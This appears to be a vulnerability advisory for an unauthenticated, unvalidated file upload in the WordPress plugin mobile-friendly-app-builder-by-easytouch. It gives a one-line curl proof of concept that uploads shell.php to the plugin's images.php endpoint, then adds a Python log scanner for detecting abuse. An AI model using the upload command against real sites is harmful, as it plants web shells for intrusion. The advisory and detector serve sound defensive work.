Title: Unrestricted File Upload vulnerability in WordPress plugin mobile-friendly-app-builder-by-easytouch v3.0
The plugin includes unlicensed vulnerable CMS software from http://www.invedion.com/

The code in file ./mobile-friendly-app-builder-by-easytouch/server/images.php doesn't require authentication or check that the user is allowed to upload content.

It also doesn't validate the uploaded file, so nothing stops an upload that contains executable code.

See:
https://plugins.svn.wordpress.org/mobile-friendly-app-builder-by-easytouch/trunk/server/images.php

$ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/mobile-friendly-app-builder-by-easytouch/server/images.php"
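To check whether this endpoint has already been used on a site, the following added example (not part of the original advisory or the plugin) scans a web access log for successful POSTs to server/images.php and for script paths the same client fetched afterwards that nobody had requested earlier in the log. It assumes the Apache/nginx common or combined log layout; the sample lines, addresses, timestamps and the uploads/ path are constructed, since the advisory does not say where uploaded files are stored.

```python
import re

# Path suffix of the endpoint named in the advisory (install prefix varies).
ENDPOINT = "/wp-content/plugins/mobile-friendly-app-builder-by-easytouch/server/images.php"
# Assumption: access log uses the Apache/nginx common or combined layout.
LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
SCRIPT_RE = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)

def find_upload_abuse(lines):
    """Flag clients that POST to the endpoint, plus any script path they
    then fetch that no one had requested earlier in the log."""
    seen_scripts, findings = set(), {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected layout
        ip, path = m["ip"], m["path"].split("?", 1)[0]
        ok = m["status"].startswith("2")
        if m["method"] == "POST" and path.endswith(ENDPOINT):
            if ok:  # rejected uploads (e.g. 403 after a fix) are not counted
                f = findings.setdefault(ip, {"ip": ip, "first_upload": m["ts"],
                                             "uploads": 0, "new_scripts": []})
                f["uploads"] += 1
            continue
        if SCRIPT_RE.search(path):
            if ok and ip in findings and path not in seen_scripts:
                findings[ip]["new_scripts"].append(path)
            seen_scripts.add(path)
    return list(findings.values())

# Constructed sample log (documentation IP ranges, placeholder file name).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2017:10:00:01 +0000] "GET /wordpress/index.php HTTP/1.1" 200 5120
198.51.100.7 - - [10/Mar/2017:10:00:05 +0000] "GET /wordpress/wp-login.php HTTP/1.1" 200 2048
203.0.113.9 - - [10/Mar/2017:10:02:11 +0000] "POST /wordpress/wp-content/plugins/mobile-friendly-app-builder-by-easytouch/server/images.php HTTP/1.1" 200 31
203.0.113.9 - - [10/Mar/2017:10:02:15 +0000] "GET /wordpress/wp-content/uploads/constructed-name.php HTTP/1.1" 200 12
203.0.113.9 - - [10/Mar/2017:10:02:20 +0000] "GET /wordpress/index.php HTTP/1.1" 200 5120
198.51.100.7 - - [10/Mar/2017:10:03:00 +0000] "GET /wordpress/wp-content/plugins/mobile-friendly-app-builder-by-easytouch/server/images.php HTTP/1.1" 200 0
"""

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG.splitlines()):
        print(finding)
```

Any finding with a non-empty new_scripts list is worth comparing against the files on disk, because the first-seen heuristic only covers the window the log retains.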